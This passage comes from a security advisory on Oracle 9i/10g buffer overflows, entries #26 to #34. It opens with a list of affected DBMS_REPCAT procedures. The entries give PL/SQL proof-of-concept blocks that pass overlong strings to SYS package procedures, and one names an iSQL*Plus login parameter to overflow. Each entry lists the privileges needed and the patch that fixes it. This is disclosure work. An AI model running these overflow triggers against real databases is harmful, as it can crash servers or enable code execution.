    DBMS_REPCAT.ALTER_PRIORITY_CHAR
    DBMS_REPCAT.ALTER_PRIORITY_DATE
    DBMS_REPCAT.ALTER_PRIORITY_NCHAR
    DBMS_REPCAT.ALTER_PRIORITY_NUMBER
    DBMS_REPCAT.ALTER_PRIORITY_NVARCHAR2
    DBMS_REPCAT.ALTER_PRIORITY_RAW
    DBMS_REPCAT.ALTER_PRIORITY_VARCHAR2
    DBMS_REPCAT.ALTER_SITE_PRIORITY
    DBMS_REPCAT.ALTER_SITE_PRIORITY_SITE
    DBMS_REPCAT.ALTER_SNAPSHOT_PROPAGATION
    DBMS_REPCAT.BEGIN_FLAVOR_DEFINITION
    DBMS_REPCAT.CANCEL_STATISTICS
    DBMS_REPCAT.COMMENT_ON_COLUMN_GROUP
    DBMS_REPCAT.COMMENT_ON_DELETE_RESOLUTION
    DBMS_REPCAT.COMMENT_ON_MVIEW_REPSITES
    DBMS_REPCAT.COMMENT_ON_PRIORITY_GROUP
    DBMS_REPCAT.COMMENT_ON_REPGROUP
    DBMS_REPCAT.COMMENT_ON_REPOBJECT
    DBMS_REPCAT.COMMENT_ON_REPSITES
    DBMS_REPCAT.COMMENT_ON_SITE_PRIORITY
    DBMS_REPCAT.COMMENT_ON_SNAPSHOT_REPSITES
    DBMS_REPCAT.COMMENT_ON_UNIQUE_RESOLUTION
    DBMS_REPCAT.COMMENT_ON_UPDATE_RESOLUTION
    DBMS_REPCAT.COMPARE_OLD_VALUES
    DBMS_REPCAT.CREATE_MASTER_REPGROUP
    DBMS_REPCAT.CREATE_MASTER_REPOBJECT
    DBMS_REPCAT.CREATE_MVIEW_REPGROUP
    DBMS_REPCAT.CREATE_MVIEW_REPOBJECT
    DBMS_REPCAT.CREATE_SNAPSHOT_REPGROUP
    DBMS_REPCAT.CREATE_SNAPSHOT_REPOBJECT
    DBMS_REPCAT.DEFINE_COLUMN_GROUP
    DBMS_REPCAT.DEFINE_PRIORITY_GROUP
    DBMS_REPCAT.DEFINE_SITE_PRIORITY
    DBMS_REPCAT.DO_DEFERRED_REPCAT_ADMIN
    DBMS_REPCAT.DROP_COLUMN_GROUP
    DBMS_REPCAT.DROP_COLUMN_GROUP_FROM_FLAVOR
    DBMS_REPCAT.DROP_COLUMNS_FROM_FLAVOR
    DBMS_REPCAT.DROP_DELETE_RESOLUTION
    DBMS_REPCAT.DROP_GROUPED_COLUMN
    DBMS_REPCAT.DROP_MASTER_REPGROUP
    DBMS_REPCAT.DROP_MASTER_REPOBJECT
    DBMS_REPCAT.DROP_MVIEW_REPGROUP
    DBMS_REPCAT.DROP_MVIEW_REPOBJECT
    DBMS_REPCAT.DROP_OBJECT_FROM_FLAVOR
    DBMS_REPCAT.DROP_PRIORITY
    DBMS_REPCAT.DROP_PRIORITY_CHAR
    DBMS_REPCAT.DROP_PRIORITY_DATE
    DBMS_REPCAT.DROP_PRIORITY_GROUP
    DBMS_REPCAT.DROP_PRIORITY_NCHAR
    DBMS_REPCAT.DROP_PRIORITY_NUMBER
    DBMS_REPCAT.DROP_PRIORITY_NVARCHAR2
    DBMS_REPCAT.DROP_PRIORITY_RAW
    DBMS_REPCAT.DROP_PRIORITY_VARCHAR2
    DBMS_REPCAT.DROP_SITE_PRIORITY
    DBMS_REPCAT.DROP_SITE_PRIORITY_SITE
    DBMS_REPCAT.DROP_SNAPSHOT_REPGROUP
    DBMS_REPCAT.DROP_SNAPSHOT_REPOBJECT
    DBMS_REPCAT.DROP_UNIQUE_RESOLUTION
    DBMS_REPCAT.DROP_UPDATE_RESOLUTION
    DBMS_REPCAT.EXECUTE_DDL
    DBMS_REPCAT.GENERATE_FLAVOR_NAME
    DBMS_REPCAT.GENERATE_MVIEW_SUPPORT
    DBMS_REPCAT.GENERATE_REPLICATION_PACKAGE
    DBMS_REPCAT.GENERATE_REPLICATION_SUPPORT
    DBMS_REPCAT.GENERATE_REPLICATION_TRIGGER
    DBMS_REPCAT.GENERATE_SNAPSHOT_SUPPORT
    DBMS_REPCAT.MAKE_COLUMN_GROUP
    DBMS_REPCAT.OBSOLETE_FLAVOR_DEFINITION
    DBMS_REPCAT.PUBLISH_FLAVOR_DEFINITION
    DBMS_REPCAT.PURGE_FLAVOR_DEFINITION
    DBMS_REPCAT.PURGE_MASTER_LOG
    DBMS_REPCAT.PURGE_STATISTICS
    DBMS_REPCAT.REFRESH_MVIEW_REPGROUP
    DBMS_REPCAT.REFRESH_SNAPSHOT_REPGROUP
    DBMS_REPCAT.REGISTER_MVIEW_REPGROUP
    DBMS_REPCAT.REGISTER_SNAPSHOT_REPGROUP
    DBMS_REPCAT.REGISTER_STATISTICS
    DBMS_REPCAT.RELOCATE_MASTERDEF
    DBMS_REPCAT.REMOVE_MASTER_DATABASES
    DBMS_REPCAT.RENAME_SHADOW_COLUMN_GROUP
    DBMS_REPCAT.REPCAT_IMPORT_CHECK
    DBMS_REPCAT.RESUME_MASTER_ACTIVITY
    DBMS_REPCAT.SEND_AND_COMPARE_OLD_VALUES
    DBMS_REPCAT.SEND_OLD_VALUES
    DBMS_REPCAT.SET_COLUMNS
    DBMS_REPCAT.SET_LOCAL_FLAVOR
    DBMS_REPCAT.SPECIFY_NEW_MASTERS
    DBMS_REPCAT.SUSPEND_MASTER_ACTIVITY
    DBMS_REPCAT.SWITCH_MVIEW_MASTER
    DBMS_REPCAT.SWITCH_SNAPSHOT_MASTER
    DBMS_REPCAT.UNREGISTER_MVIEW_REPGROUP
    DBMS_REPCAT.UNREGISTER_SNAPSHOT_REPGROUP
    DBMS_REPCAT.VALIDATE
    DBMS_REPCAT.VALIDATE_FLAVOR_DEFINITION
    DBMS_REPCAT.VALIDATE_FOR_LOCAL_FLAVOR
    DBMS_REPCAT.WAIT_MASTER_LOG
    DBMS_REPCAT_ADD_MASTER.SPECIFY_NEW_MASTERS
    DBMS_REPCAT_ADMIN.REGISTER_USER_REPGROUP
    DBMS_REPCAT_ADMIN.UNREGISTER_USER_REPGROUP
    DBMS_REPCAT_AUTH.GRANT_SURROGATE_REPCAT
    DBMS_REPCAT_AUTH.REVOKE_SURROGATE_REPCAT
    DBMS_REPCAT_CONF.ADD_DELETE_RESOLUTION
    DBMS_REPCAT_CONF.ADD_GROUPED_COLUMN
    DBMS_REPCAT_CONF.ADD_PRIORITY_CHAR
    DBMS_REPCAT_CONF.ADD_PRIORITY_DATE
    DBMS_REPCAT_CONF.ADD_PRIORITY_NCHAR
    DBMS_REPCAT_CONF.ADD_PRIORITY_NUMBER
    DBMS_REPCAT_CONF.ADD_PRIORITY_NVARCHAR2
    DBMS_REPCAT_CONF.ADD_PRIORITY_RAW
    DBMS_REPCAT_CONF.ADD_PRIORITY_VARCHAR2
    DBMS_REPCAT_CONF.ADD_SITE_PRIORITY_SITE
    DBMS_REPCAT_CONF.ADD_UNIQUE_RESOLUTION
    DBMS_REPCAT_CONF.ADD_UPDATE_RESOLUTION
    DBMS_REPCAT_CONF.ALTER_PRIORITY
    DBMS_REPCAT_CONF.ALTER_PRIORITY_CHAR
    DBMS_REPCAT_CONF.ALTER_PRIORITY_DATE
    DBMS_REPCAT_CONF.ALTER_PRIORITY_NCHAR
    DBMS_REPCAT_CONF.ALTER_PRIORITY_NUMBER
    DBMS_REPCAT_CONF.ALTER_PRIORITY_NVARCHAR2
    DBMS_REPCAT_CONF.ALTER_PRIORITY_RAW
    DBMS_REPCAT_CONF.ALTER_PRIORITY_VARCHAR2
    DBMS_REPCAT_CONF.ALTER_SITE_PRIORITY
    DBMS_REPCAT_CONF.ALTER_SITE_PRIORITY_SITE
    DBMS_REPCAT_CONF.CANCEL_STATISTICS
    DBMS_REPCAT_CONF.CHECK_GROUP_INFO
    DBMS_REPCAT_CONF.CHECK_ONAME_INFO
    DBMS_REPCAT_CONF.COMMENT_ON_COLUMN_GROUP
    DBMS_REPCAT_CONF.COMMENT_ON_DELETE_RESOLUTION
    DBMS_REPCAT_CONF.COMMENT_ON_PRIORITY_GROUP
    DBMS_REPCAT_CONF.COMMENT_ON_SITE_PRIORITY
    DBMS_REPCAT_CONF.COMMENT_ON_UNIQUE_RESOLUTION
    DBMS_REPCAT_CONF.COMMENT_ON_UPDATE_RESOLUTION
    DBMS_REPCAT_CONF.DEFINE_COLUMN_GROUP
    DBMS_REPCAT_CONF.DEFINE_PRIORITY_GROUP
    DBMS_REPCAT_CONF.DEFINE_SITE_PRIORITY
    DBMS_REPCAT_CONF.DROP_COLUMN_GROUP
    DBMS_REPCAT_CONF.DROP_DELETE_RESOLUTION
    DBMS_REPCAT_CONF.DROP_GROUPED_COLUMN
    DBMS_REPCAT_CONF.DROP_PRIORITY
    DBMS_REPCAT_CONF.DROP_PRIORITY_CHAR
    DBMS_REPCAT_CONF.DROP_PRIORITY_DATE
    DBMS_REPCAT_CONF.DROP_PRIORITY_GROUP
    DBMS_REPCAT_CONF.DROP_PRIORITY_NCHAR
    DBMS_REPCAT_CONF.DROP_PRIORITY_NUMBER
    DBMS_REPCAT_CONF.DROP_PRIORITY_NVARCHAR2
    DBMS_REPCAT_CONF.DROP_PRIORITY_RAW
    DBMS_REPCAT_CONF.DROP_PRIORITY_VARCHAR2
    DBMS_REPCAT_CONF.DROP_SITE_PRIORITY
    DBMS_REPCAT_CONF.DROP_SITE_PRIORITY_SITE
    DBMS_REPCAT_CONF.DROP_UNIQUE_RESOLUTION
    DBMS_REPCAT_CONF.DROP_UPDATE_RESOLUTION
    DBMS_REPCAT_CONF.MAKE_COLUMN_GROUP
    DBMS_REPCAT_CONF.PURGE_STATISTICS
    DBMS_REPCAT_CONF.REGISTER_STATISTICS
    DBMS_REPCAT_FLA.ABORT_DEFINITION
    DBMS_REPCAT_FLA.ABORT_FLAVOR_DEFINITION
    DBMS_REPCAT_FLA.ADD_OBJECT
    DBMS_REPCAT_FLA.ADD_OBJECT_TO_FLAVOR
    DBMS_REPCAT_FLA.BEGIN_DEFINITION
    DBMS_REPCAT_FLA.BEGIN_FLAVOR_DEFINITION
    DBMS_REPCAT_FLA.DROP_OBJECT
    DBMS_REPCAT_FLA.DROP_OBJECT_FROM_FLAVOR
    DBMS_REPCAT_FLA.ENSURE_NOT_PUBLISHED
    DBMS_REPCAT_FLA.GENERATE_FLAVOR_NAME
    DBMS_REPCAT_FLA.LOCAL_OBJECT_MATCHES
    DBMS_REPCAT_FLA.SET_LOCAL_FLAVOR
    DBMS_REPCAT_FLA.VALIDATE_DEFINITION
    DBMS_REPCAT_FLA.VALIDATE_FLAVOR_DEFINITION
    DBMS_REPCAT_FLA.VALIDATE_FOR_LOCAL_FLAVOR
    DBMS_REPCAT_FLA.VALIDATE_LOCAL
    DBMS_REPCAT_FLA.VALIDATE_LOCAL_COLS
    DBMS_REPCAT_FLA.VALIDATE_LOCAL_MAS
    DBMS_REPCAT_FLA.VALIDATE_LOCAL_SNAP
    DBMS_REPCAT_FLA.VALIDATE_TABLE
    DBMS_REPCAT_FLA_MAS.ADD_COLUMN_GROUP_TO_FLAVOR
    DBMS_REPCAT_FLA_MAS.ADD_COLUMNS_TO_FLAVOR
    DBMS_REPCAT_FLA_MAS.DROP_COLUMN_GROUP_FROM_FLAVOR
    DBMS_REPCAT_FLA_MAS.DROP_COLUMNS_FROM_FLAVOR
    DBMS_REPCAT_FLA_MAS.OBSOLETE_DEFINITION
    DBMS_REPCAT_FLA_MAS.OBSOLETE_FLAVOR_DEFINITION
    DBMS_REPCAT_FLA_MAS.PUBLISH_DEFINITION
    DBMS_REPCAT_FLA_MAS.PUBLISH_FLAVOR_DEFINITION
    DBMS_REPCAT_FLA_MAS.PURGE_DEFINITION
    DBMS_REPCAT_FLA_MAS.PURGE_FLAVOR_DEFINITION
    DBMS_REPCAT_FLA_UTL.CANONICALIZE_FLAVOR
    DBMS_REPCAT_FLA_UTL.CANONICALIZE_OBJECT
    DBMS_REPCAT_INSTANTIATE.DROP_SITE_INSTANTIATION
    DBMS_REPCAT_INSTANTIATE.INSTANTIATE_OFFLINE
    DBMS_REPCAT_INSTANTIATE.INSTANTIATE_ONLINE
    DBMS_REPCAT_MAS.ADD_MASTER_DATABASE
    DBMS_REPCAT_MAS.ALTER_MASTER_PROPAGATION
    DBMS_REPCAT_MAS.ALTER_MASTER_REPOBJECT
    DBMS_REPCAT_MAS.COMMENT_ON_REPGROUP
    DBMS_REPCAT_MAS.COMMENT_ON_REPOBJECT
    DBMS_REPCAT_MAS.COMMENT_ON_REPSITES
    DBMS_REPCAT_MAS.CREATE_MASTER_REPGROUP
    DBMS_REPCAT_MAS.CREATE_MASTER_REPOBJECT
    DBMS_REPCAT_MAS.DO_DEFERRED_REPCAT_ADMIN
    DBMS_REPCAT_MAS.DROP_MASTER_REPGROUP
    DBMS_REPCAT_MAS.ENSURE_MASTERDEF
    DBMS_REPCAT_MAS.EXECUTE_DDL
    DBMS_REPCAT_MAS.GENERATE_REPLICATION_PACKAGE
    DBMS_REPCAT_MAS.GENERATE_REPLICATION_SUPPORT
    DBMS_REPCAT_MAS.GENERATE_REPLICATION_TRIGGER
    DBMS_REPCAT_MAS.PURGE_MASTER_LOG
    DBMS_REPCAT_MAS.RELOCATE_MASTERDEF
    DBMS_REPCAT_MAS.REMOVE_MASTER_DATABASES
    DBMS_REPCAT_MAS.RENAME_SHADOW_COLUMN_GROUP
    DBMS_REPCAT_MAS.RESUME_MASTER_ACTIVITY
    DBMS_REPCAT_MAS.SEND_AND_COMPARE_OLD_VALUES
    DBMS_REPCAT_MAS.SET_COLUMNS
    DBMS_REPCAT_MAS.SUSPEND_MASTER_ACTIVITY
    DBMS_REPCAT_MAS.WAIT_MASTER_LOG
    DBMS_REPCAT_OBJ_UTL.LCNAME_TAB_TO_CNAME_TAB
    DBMS_REPCAT_RGT.CHECK_DDL_TEXT
    DBMS_REPCAT_RGT.CREATE_OBJECT_FROM_EXISTING
    DBMS_REPCAT_RGT.DROP_SITE_INSTANTIATION
    DBMS_REPCAT_RGT.INSTANTIATE_OFFLINE
    DBMS_REPCAT_RGT.INSTANTIATE_ONLINE
    DBMS_REPCAT_RGT_CUST.CREATE_OBJECT_FROM_EXISTING
    DBMS_REPCAT_RPC.GET_OBJECT_SHAPE
    DBMS_REPCAT_RPC.GET_OBJECT_SHAPE_RC
    DBMS_REPCAT_RPC.RELOCATE_MASTERDEF
    DBMS_REPCAT_RPC.RELOCATE_MASTERDEF_RC
    DBMS_REPCAT_SNA.ALTER_SNAPSHOT_PROPAGATION
    DBMS_REPCAT_SNA.CREATE_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SNA.CREATE_SNAPSHOT_REPOBJECT
    DBMS_REPCAT_SNA.CREATE_SNAPSHOT_REPSCHEMA
    DBMS_REPCAT_SNA.DROP_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SNA.DROP_SNAPSHOT_REPOBJECT
    DBMS_REPCAT_SNA.DROP_SNAPSHOT_REPSCHEMA
    DBMS_REPCAT_SNA.GENERATE_SNAPSHOT_SUPPORT
    DBMS_REPCAT_SNA.REFRESH_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SNA.REFRESH_SNAPSHOT_REPSCHEMA
    DBMS_REPCAT_SNA.REGISTER_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SNA.REPCAT_IMPORT_CHECK
    DBMS_REPCAT_SNA.SET_LOCAL_FLAVOR
    DBMS_REPCAT_SNA.SWITCH_SNAPSHOT_MASTER
    DBMS_REPCAT_SNA.UNREGISTER_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SNA.VALIDATE_FOR_LOCAL_FLAVOR
    DBMS_REPCAT_SNA_UTL.ALTER_SNAPSHOT_PROPAGATION
    DBMS_REPCAT_SNA_UTL.CHECK_REGISTRATION_PARAMS
    DBMS_REPCAT_SNA_UTL.CREATE_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SNA_UTL.CREATE_SNAPSHOT_REPOBJECT
    DBMS_REPCAT_SNA_UTL.DROP_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SNA_UTL.DROP_SNAPSHOT_REPOBJECT
    DBMS_REPCAT_SNA_UTL.GENERATE_SNAPSHOT_SUPPORT
    DBMS_REPCAT_SNA_UTL.LOCAL_GENERATE_DDL
    DBMS_REPCAT_SNA_UTL.REFRESH_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SNA_UTL.REGISTER_FLAVOR_CHANGE
    DBMS_REPCAT_SNA_UTL.REGISTER_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SNA_UTL.REMOTE_GENERATE_DDL
    DBMS_REPCAT_SNA_UTL.REPCAT_IMPORT_CHECK
    DBMS_REPCAT_SNA_UTL.SWITCH_SNAPSHOT_MASTER
    DBMS_REPCAT_SNA_UTL.UNREGISTER_SNAPSHOT_REPGROUP
    DBMS_REPCAT_SQL_UTL.DO_ARRAY_DDL
    DBMS_REPCAT_SQL_UTL.DO_DDL
    DBMS_REPCAT_SQL_UTL.DO_MULTIPLE_DDLS
    DBMS_REPCAT_UNTRUSTED.REGISTER_SNAPSHOT_REPGROUP
    DBMS_REPCAT_UNTRUSTED.UNREGISTER_SNAPSHOT_REPGROUP
    DBMS_REPCAT_UTL.CANONICALIZE
    DBMS_REPCAT_UTL.COMMENT_ON_REPSITES
    DBMS_REPCAT_UTL.CONVERT_REASON_TO_ID
    DBMS_REPCAT_UTL.CONVERT_TYPE_TO_ID
    DBMS_REPCAT_UTL.DEFAULT_FUNCTION_NAME
    DBMS_REPCAT_UTL.DROP_AN_OBJECT
    DBMS_REPCAT_UTL.FOLLOW_SYNONYM_CHAIN
    DBMS_REPCAT_UTL.GENERATE_WHAT_AM_I
    DBMS_REPCAT_UTL.GET_REPCOLUMN_FLAG
    DBMS_REPCAT_UTL.RESOLVE_NAME
    DBMS_REPCAT_UTL.SET_REPCOLUMN_FLAG
    DBMS_REPCAT_UTL2.CHECK_OBJECT_SHAPE
    DBMS_REPCAT_UTL2.GET_OBJECT_SHAPE
    DBMS_REPCAT_UTL3.RETRY_NEEDED
    DBMS_REPCAT_UTL4.COMPARE_SOURCE
    DBMS_REPCAT_UTL4.COMPARE_TABLES
    DBMS_REPCAT_UTL4.DROP_MASTER_REPOBJECT
    DBMS_REPCAT_UTL4.ENSURE_MASTER
    DBMS_REPCAT_UTL4.MASTERDEF_PREFIX
    DBMS_REPCAT_UTL4.NAME_CONFLICT_EXISTS
    DBMS_REPCAT_VALIDATE.VALIDATE

    To reproduce the overflow, execute the next PL/SQL:

    BEGIN
    SYS.DBMS_REPCAT_AUTH.GRANT_SURROGATE_REPCAT('longstring');
    END;

    or

    BEGIN
    SYS.DBMS_REPCAT_AUTH.REVOKE_SURROGATE_REPCAT('longstring');
    END;

    etc.

    Analysis:
    This vulnerability can be exploited by members of the SYSDBA role and by
    users granted execute permissions on the packages.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5). 10g not vulnerable.

    #26 - Heap-based buffer overflow vulnerability in the Oracle 10g iSQL*Plus
    service
    Details:
    SQL*Plus is an interactive and batch query tool that is installed with
    every Oracle Database Server or Client installation. It has a command-line
    user interface, a Windows Graphical User Interface (GUI) and the iSQL*Plus
    web-based user interface. iSQL*Plus is a browser-based interface which
    uses the SQL*Plus processing engine. A heap overflow vulnerability exists
    in this service. To overflow the buffer, supply a long string in the
    'username' or 'connectID' parameter of /isqlplus/login.uix

    Analysis:
    A remote unauthenticated user can execute arbitrary code in the context of
    the iSQL*Plus service. It can also be exploited to cause a denial of
    service (DoS) by killing the Oracle server process.

    Vendor Fix:
    Oracle 9i not affected. Fixed in Oracle 10g Patchset 1.

    #27 - Buffer overflow in procedure AQ_TABLE_DEFN_UPDATE of
    DBMS_AQ_IMPORT_INTERNAL package
    Details:
    When AQ_TABLE_DEFN_UPDATE procedure is called with a long string in the
    QT_NAME parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE p_6_PRIMARY_INSTANCE BINARY_INTEGER;
    p_7_SECONDARY_INSTANCE BINARY_INTEGER;
    AAA VARCHAR2(32767);
    BEGIN
    AAA:='A';
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA || AAA;
    SYS.DBMS_AQ_IMPORT_INTERNAL.AQ_TABLE_DEFN_UPDATE (QT_SCHEMA => 'SYS',
    QT_NAME => AAA, UDATA => 1, QT_FLAGS => 1, SORT_COLS => 1,
    PRIMARY_INSTANCE => p_6_PRIMARY_INSTANCE, SECONDARY_INSTANCE =>
    p_7_SECONDARY_INSTANCE, COMMENT => 'Y');
    END;

    Analysis:
    This vulnerability can be exploited by members of any of the following
    roles: EXECUTE_CATALOG_ROLE, EXP_FULL_DATABASE, AQ_ADMINISTRATOR_ROLE or
    SYSDBA, and by users granted execute permissions on the
    DBMS_AQ_IMPORT_INTERNAL package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #28 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_GET_NRP of
    DBMS_AQADM package
    Details:
    When VERIFY_QUEUE_TYPES_GET_NRP procedure is called with a long string in
    the SRC_QUEUE_NAME parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    P_SRC_QUEUE_NAME VARCHAR2(32767);
    P_DEST_QUEUE_NAME VARCHAR2(32767);
    P_DESTINATION VARCHAR2(32767);
    P_RC BINARY_INTEGER;
    P_TRANSFORMATION VARCHAR2(32767);
    BEGIN
    P_SRC_QUEUE_NAME := 'longstring';
    P_DEST_QUEUE_NAME := '';
    P_DESTINATION := '';
    P_TRANSFORMATION := '';
    SYS.DBMS_AQADM.VERIFY_QUEUE_TYPES_GET_NRP(SRC_QUEUE_NAME =>
    P_SRC_QUEUE_NAME, DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
    P_DESTINATION, RC => P_RC, TRANSFORMATION => P_TRANSFORMATION);
    END;

    Analysis:
    This vulnerability can be exploited by members of any of the following
    roles: EXECUTE_CATALOG_ROLE, IMP_FULL_DATABASE, QS_ADM, QS, QS_WS, QS_ES,
    QS_OS, QS_CBADM, QS_CB, QS_CS or SYSDBA, and by users granted execute
    permissions on the DBMS_AQADM package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #29 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_NO_QUEUE of
    DBMS_AQADM package
    Details:
    When VERIFY_QUEUE_TYPES_NO_QUEUE procedure is called with a long string in
    the SRC_QUEUE_NAME parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    P_SRC_QUEUE_NAME VARCHAR2(32767);
    P_DEST_QUEUE_NAME VARCHAR2(32767);
    P_DESTINATION VARCHAR2(32767);
    P_RC BINARY_INTEGER;
    P_TRANSFORMATION VARCHAR2(32767);
    BEGIN
    P_SRC_QUEUE_NAME := 'longstring';
    P_DEST_QUEUE_NAME := '';
    P_DESTINATION := '';
    P_TRANSFORMATION := '';
    SYS.DBMS_AQADM.VERIFY_QUEUE_TYPES_NO_QUEUE(SRC_QUEUE_NAME =>
    P_SRC_QUEUE_NAME, DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
    P_DESTINATION, RC => P_RC, TRANSFORMATION => P_TRANSFORMATION);
    END;

    Analysis:
    This vulnerability can be exploited by members of any of the following
    roles: EXECUTE_CATALOG_ROLE, IMP_FULL_DATABASE, QS_ADM, QS, QS_WS, QS_ES,
    QS_OS, QS_CBADM, QS_CB, QS_CS or SYSDBA, and by users granted execute
    permissions on the DBMS_AQADM package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #30 - Buffer overflow in procedure VERIFY_QUEUE_TYPES of DBMS_AQADM_SYS
    package
    Details:
    When VERIFY_QUEUE_TYPES procedure is called with a long string in the
    SRC_QUEUE_NAME parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    P_SRC_QUEUE_NAME VARCHAR2(32767);
    P_DEST_QUEUE_NAME VARCHAR2(32767);
    P_DESTINATION VARCHAR2(32767);
    P_TRANSFORMATION VARCHAR2(32767);
    P_QUEUE_EXISTS BOOLEAN;
    P_GET_NRP BOOLEAN;
    P_RC BINARY_INTEGER;
    AAA VARCHAR2(32767);
    BEGIN
    AAA:='A';
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    P_SRC_QUEUE_NAME := AAA;
    P_DEST_QUEUE_NAME := '';
    P_DESTINATION := '';
    P_TRANSFORMATION := '';
    P_QUEUE_EXISTS := FALSE;
    P_GET_NRP := FALSE;
    SYS.DBMS_AQADM_SYS.VERIFY_QUEUE_TYPES(SRC_QUEUE_NAME => P_SRC_QUEUE_NAME,
    DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
    P_DESTINATION, TRANSFORMATION => P_TRANSFORMATION, QUEUE_EXISTS =>
    P_QUEUE_EXISTS, GET_NRP => P_GET_NRP, RC => P_RC);
    END;

    Analysis:
    This vulnerability can be exploited by members of the SYSDBA role and by
    users granted execute permissions on the DBMS_AQADM_SYS package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #31 - Buffer overflow in procedure PARALLEL_PUSH_RECOVERY of
    DBMS_DEFER_INTERNAL_SYS package
    Details:
    When PARALLEL_PUSH_RECOVERY procedure is called with a long string in the
    DESTINATION parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    P_DESTINATION VARCHAR2(32767);
    P_ORIGIN VARCHAR2(32767);
    BEGIN
    P_DESTINATION := 'longstring';
    P_ORIGIN := '';
    SYS.DBMS_DEFER_INTERNAL_SYS.PARALLEL_PUSH_RECOVERY(DESTINATION =>
    P_DESTINATION, ORIGIN => P_ORIGIN);
    END;

    Analysis:
    This vulnerability can be exploited by members of the SYSDBA role and by
    users granted execute permissions on the DBMS_DEFER_INTERNAL_SYS package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #32 - Buffer overflow in procedure ENABLE_PROPAGATION_TO_DBLINK of
    DBMS_DEFER_REPCAT package
    Details:
    When ENABLE_PROPAGATION_TO_DBLINK procedure is called with a long string
    as the parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    RET_VALUE_X123 BOOLEAN;
    BEGIN
    RET_VALUE_X123 :=
    SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK('longstring');
    END;

    or

    DECLARE a BOOLEAN; -- return value
    BEGIN
    a := SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK (DBLINK =>
    'longstring', NORMAL_ONLY => FALSE, INTERNAL_SET => FALSE);
    END;

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA role and by users granted execute permissions on the
    DBMS_DEFER_REPCAT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #33 - Buffer overflow in procedure DISABLE_RECEIVER_TRACE of
    DBMS_INTERNAL_REPCAT package
    Details:
    When DISABLE_RECEIVER_TRACE procedure is called with a long string in the
    GNAME parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    BEGIN
    SYS.DBMS_INTERNAL_REPCAT.DISABLE_RECEIVER_TRACE (GNAME => 'longstring');
    END;

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA role and by users granted execute permissions on the
    DBMS_INTERNAL_REPCAT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #34 - Buffer overflow in procedure ENABLE_RECEIVER_TRACE of
    DBMS_INTERNAL_REPCAT package
    Details:
    When ENABLE_RECEIVER_TRACE procedure is called with a long string in the
    GNAME parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    BEGIN
    SYS.DBMS_INTERNAL_REPCAT.ENABLE_RECEIVER_TRACE (GNAME => 'longstring');
    END;

    Analysis:
